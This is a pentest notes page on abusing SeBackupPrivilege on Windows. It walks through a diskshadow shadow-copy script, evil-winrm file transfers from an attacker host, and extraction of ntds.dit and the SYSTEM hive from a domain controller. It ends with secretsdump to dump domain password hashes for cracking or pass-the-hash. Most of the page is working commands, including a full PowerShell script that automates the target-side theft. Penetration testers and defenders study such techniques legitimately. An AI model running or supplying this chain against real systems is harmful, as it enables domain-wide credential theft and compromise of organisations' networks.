Exploit Notes

Windows PrivEsc with SeBackupPrivilege

Last modified: 2023-02-08

Privilege Escalation Windows

SeBackupPrivilege lets a process open any file for reading with backup semantics, bypassing the file's DACL. Members of the Backup Operators group hold it by default, which is why a compromised backup service account is a classic path to domain compromise.

Investigation

First check whether the current user holds SeBackupPrivilege (listed under PRIVILEGES INFORMATION).

whoami /all

If so, we can read any file on the system regardless of its ACL, including the SAM and SYSTEM registry hives and, on a domain controller, ntds.dit. A state of "Disabled" in the output only means the privilege is not currently enabled in the token; tools that use backup semantics (reg.exe, robocopy /B, the cmdlets below) enable it themselves.


Exploitation

1. Create a Payload

Create “diskshadow.txt” on the local machine. It refers to this.

set metadata C:\tmp\tmp.cabs 
set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% h:

The trailing space after each command is deliberate: a commonly reported diskshadow quirk drops the last character of each line of the script file, which would break the alias and the drive letter.

Then transfer the file to the target machine.

Before that, create a “tmp” folder in the root of C: on the target machine (the script's metadata path points there).

mkdir \tmp
cd \tmp

For example, on the target machine:

# [Option 1] PowerShell (we need to start web server in local machine)
PS> Invoke-WebRequest -Uri http://10.0.0.1:8000/diskshadow.txt -OutFile .\diskshadow.txt

# [Option 2] In evil-winrm
PS> upload diskshadow.txt

2. Execute DiskShadow.Exe

Then execute diskshadow.exe (shipped with Windows Server) with the script. It creates a VSS snapshot of C: and exposes it as H:, which is what lets us copy files that are locked by running services, such as ntds.dit held open by AD DS.

# /s: Specify the script file
diskshadow.exe /s .\diskshadow.txt

3. Upload Malicious DLL

Download the two DLLs of the SeBackupPrivilege PowerShell module from here.

# In evil-winrm
PS> upload SeBackupPrivilegeUtils.dll
PS> upload SeBackupPrivilegeCmdLets.dll
PS> Import-Module .\SeBackupPrivilegeUtils.dll
PS> Import-Module .\SeBackupPrivilegeCmdLets.dll
# Copy ntds.dit from the shadow copy exposed as H: (the live file is locked by AD DS)
PS> Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\tmp\ntds.dit -overwrite
# Save the SYSTEM hive; it holds the boot key needed to decrypt the hashes in ntds.dit
PS> reg save HKLM\SYSTEM c:\tmp\system
PS> download ntds.dit
PS> download system
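The target-side steps 1 to 3 above as one PowerShell script, added here as an example (it is not code from the original page or from the SeBackupPrivilege module). It assumes a Windows Server domain controller, a writable C:\tmp, the shadow copy exposed as H:, and it swaps in robocopy /B (backup mode) for the Copy-FileSeBackupPrivilege cmdlet so nothing has to be uploaded besides the script itself; both rely on the same privilege. It also deletes the exposed shadow copy afterwards so it is not left behind on the DC.

```powershell
# Added example: SeBackupPrivilege -> ntds.dit + SYSTEM hive, run from an evil-winrm shell.
# Assumptions: C:\tmp is writable, H: is free, diskshadow.exe exists (Windows Server),
# robocopy /B is used instead of the page's SeBackupPrivilege DLLs.
$work  = 'C:\tmp'
$drive = 'h:'   # drive letter the shadow copy will be exposed on

# 0. Confirm the privilege is in the token. "Disabled" is fine: backup-aware tools enable it.
$priv = whoami /priv | Select-String 'SeBackupPrivilege'
if (-not $priv) { throw 'SeBackupPrivilege is not present in the current token' }
Write-Host "[*] $($priv.Line.Trim())"

New-Item -ItemType Directory -Path $work -Force | Out-Null

# 1. Write the diskshadow script. Set-Content on Windows emits CRLF line endings;
#    the trailing space on each command line is kept on purpose (diskshadow quirk).
$script = @"
set metadata $work\tmp.cab 
set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% $drive 
"@
Set-Content -Path "$work\diskshadow.txt" -Value $script -Encoding ASCII

# 2. Snapshot C: and expose it as H:, then verify the locked file is visible there.
diskshadow.exe /s "$work\diskshadow.txt" | Out-Null
if (-not (Test-Path "$drive\Windows\NTDS\ntds.dit")) {
    throw "Shadow copy was not exposed on $drive, check diskshadow output"
}

# 3. Copy ntds.dit from the snapshot in backup mode (/B bypasses the DACL),
#    then save the SYSTEM hive (reg.exe enables SeBackupPrivilege itself).
robocopy "$drive\Windows\NTDS" $work ntds.dit /B /NFL /NDL /NJH /NJS | Out-Null
if ($LASTEXITCODE -ge 8) { throw "robocopy failed with exit code $LASTEXITCODE" }
reg save HKLM\SYSTEM "$work\system" /y | Out-Null

# Remove the exposed shadow copy so it is not left on the DC.
Set-Content -Path "$work\cleanup.txt" -Value "delete shadows exposed $drive" -Encoding ASCII
diskshadow.exe /s "$work\cleanup.txt" | Out-Null

# Files to pull back with evil-winrm's download command.
Get-Item "$work\ntds.dit", "$work\system" | Select-Object Name, Length
```

After it finishes, `download ntds.dit` and `download system` from the evil-winrm prompt and continue with step 4 on the attacking machine. Note that diskshadow creates a persistent shadow copy; if the cleanup step is skipped, the snapshot (and the H: exposure) stays on the DC until an administrator removes it.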

4. Dump Password Hashes

Now we have two files (ntds.dit and system) on the local machine.
We can dump the password hashes from them offline; the SYSTEM hive supplies the boot key that secretsdump needs to decrypt ntds.dit.

impacket-secretsdump -ntds ntds.dit -system system LOCAL

After that, crack the hashes or use them for pass-the-hash.
